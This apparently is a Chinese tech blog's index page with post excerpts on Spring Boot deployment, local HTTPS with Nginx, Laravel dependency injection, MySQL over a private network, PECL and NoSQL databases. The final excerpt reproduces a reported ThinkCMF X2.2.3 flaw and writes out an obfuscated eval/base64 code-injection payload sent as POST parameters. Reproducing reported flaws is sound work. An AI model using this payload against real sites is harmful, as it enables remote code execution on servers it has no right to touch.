发表于 | 分类于 |
字数统计: 738 | 阅读时长 ≈ 3

准备工作

  • 一个可以访问的服务器,已安装宝塔面板。
  • Java开发环境(JDK)已安装在服务器上。
  • Maven或Gradle等构建工具,用于打包 Spring Boot 项目,我这里用的是 Maven
  • 集成开发环境,我这里使用的是IntelliJ IDEA。

项目打包

  1. 配置 pom.xml(针对 Maven):

因为我这边是通过阿里云云原生应用脚手架生成的 Spring Boot 项目,所以在 pom.xml 文件中包含了 Spring Boot 插件,示例如下:

阅读全文 »

发表于 | 分类于 |
字数统计: 783 | 阅读时长 ≈ 2

对于非Java开发的后端开发人员而言,即便未曾接触过Java,也可能听说过Spring Boot这一框架。若想要快速搭建并运行一个Spring Boot项目,可以遵循以下步骤:

环境准备

  • 安装Java JDK:确保您的开发环境中安装了Java JDK8(JDK1.8或JDK8)或更高版本,我这里用的是JDK8。
  • 安装Maven:Maven是Java项目构建和依赖管理工具,确保已安装并配置好环境变量。
  • IDE(集成开发环境):推荐使用IntelliJ IDEA或Eclipse,这些工具可以帮助你轻松管理和运行Java项目,我这里使用的是IntelliJ IDEA。
阅读全文 »

发表于 | 分类于 |
字数统计: 930 | 阅读时长 ≈ 3

引言

在开发和测试过程中,使用 HTTPS 进行本地开发可以模拟生产环境,确保应用程序在实际部署时的安全性。本文将介绍如何在 Windows 环境中生成本地 SSL 证书,并将其配置到 Nginx 服务器上,以便通过 HTTPS 访问本地服务器。

安装必要工具

安装 OpenSSL

OpenSSL 是一个用于生成和管理 SSL/TLS 证书的工具。下载并安装 OpenSSL:

  1. 访问 OpenSSL 的 Windows 安装程序
  2. 下载适合你 Windows 版本的安装程序(例如 Win64 OpenSSL v3.3.1)。
    按照安装程序的提示完成安装。
  3. 安装后配置把D:\Program Files\OpenSSL-Win64\bin配置到环境变量。
阅读全文 »

发表于 | 分类于 |
字数统计: 6.4k | 阅读时长 ≈ 23

名词解释:

  • IoC:Inversion of Control(控制反转)
  • DI:Dependency Injection(依赖注入)
  • 容器:Container

Laravel框架可能是PHP开发者最常用的框架之一,它的核心就是一个IoC容器,根据文档称其为服务容器,顾名思义该容器提供了整个框架中需要的一系列服务。作为初学者很多人会在这一个概念上犯难,因此我们可以从一些基础的内容开始讲解,通过理解面向对象开发中依赖的生产和解决方法,来逐步揭开“依赖注入”的面纱,逐渐理解这一神奇的设计理念。

阅读全文 »

发表于 | 分类于 |
字数统计: 2.1k | 阅读时长 ≈ 7

在Web开发的世界里,网络攻击是一种常见且潜在的威胁。理解这些攻击如何运作并采取措施防范它们对于构建安全的Web应用至关重要。本文将介绍几种常见的Web攻击,提供防范策略,并以实例说明如何防止这些攻击。

阅读全文 »

发表于 | 分类于 |
字数统计: 625 | 阅读时长 ≈ 2

我们以阿里云云服务器为例,实现相同地域两台服务器间内网链接MySQL数据库。

服务器A:内网IP:10.10.10.100,并搭建MySQL数据库。
服务器B:内网IP:10.10.10.101。

如果两台服务器网络是专有网络,则需要保证这两台服务器在同一个专有网络下,否则两台服务器无法互相访问,下面我们以在同一个专有网络为例。

服务器间ping测试

先登录服务器B命令行执行ping命令,查看是否可以访问服务器A

1
2
3
4
5
# ping 10.10.10.100 -c 3
PING 10.25.0.70 (10.10.10.100) 56(84) bytes of data.
64 bytes from 10.10.10.100: icmp_seq=1 ttl=64 time=2.74 ms
64 bytes from 10.10.10.100: icmp_seq=2 ttl=64 time=2.66 ms
64 bytes from 10.10.10.100: icmp_seq=3 ttl=64 time=2.66 ms

如果访问失败,再次查看两台服务器网络环境是否一致。

配置服务器安全组

登录阿里云平台,在服务器所在的安全组配置访问规则

阅读全文 »

发表于 | 分类于 |
字数统计: 706 | 阅读时长 ≈ 2

PECL(PHP Extension Community Library)是 PHP 的扩展库,它提供了一些 PHP 扩展,可以增强 PHP 的功能。所有扩展包列表查询地址:https://pecl.php.net/package-stats.php

Window 上安装PHP扩展

在PECL上找到所需要的PHP扩展,点击有DLL标识的链接地址,进行对应PHP版本的资源下载,但是你需要注意以下几点问题:

  • VC6 是运行于 Apache 服务器;
  • Thread safe(线程安全)是以模块形式运行在 Apache 上,如果你以 CGI 的模式运行 PHP,请选择非线程安全模式(non-thread safe);
  • VC9 是运行于 IIS 服务器上;
  • 下载完你需要的二进制包后,解压压缩包,将 php_mongodb.dll 文件添加到你的PHP扩展目录中(ext)。ext 目录通常在 PHP 安装目录下的 ext 目录。

打开 php 配置文件 php.ini 添加以下配置:

阅读全文 »

发表于 | 分类于 |
字数统计: 473 | 阅读时长 ≈ 1

Redis、Memcached和MongoDB是三种常用的NoSQL数据库,它们各自有着不同的特点和应用场景。

Redis

Redis是一种基于内存的数据结构存储系统,它支持多种数据结构,包括字符串(String)、哈希表(Dict)、列表(List)、集合(Set)、有序集合(sorted set)和基数估算(HyperLogLog)。

Redis的主要特点是速度快,支持高并发读写操作,并且可以持久化数据

阅读全文 »

发表于 | 分类于 |
字数统计: 467 | 阅读时长 ≈ 1

接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻

网站是基于ThinkCMF框架搭建的,查看版本是X2.2.3,根据网警提供的检测报告在postman工具上操作复现漏洞情况

  • 使用POST方式请求首页链接地址
  • 使用form-data提交参数
  • 参数content=<php>die(assert('ev'.'a'.'l("'.'e'.'va'.'l(bas'.'e64_de'.'code(\"cGhwaW5mbygpOw==\"));;return 1;")'))</php>
  • 参数a=fetch

点击发送,看看结果,意不意外惊不惊喜!

阅读全文 »
0%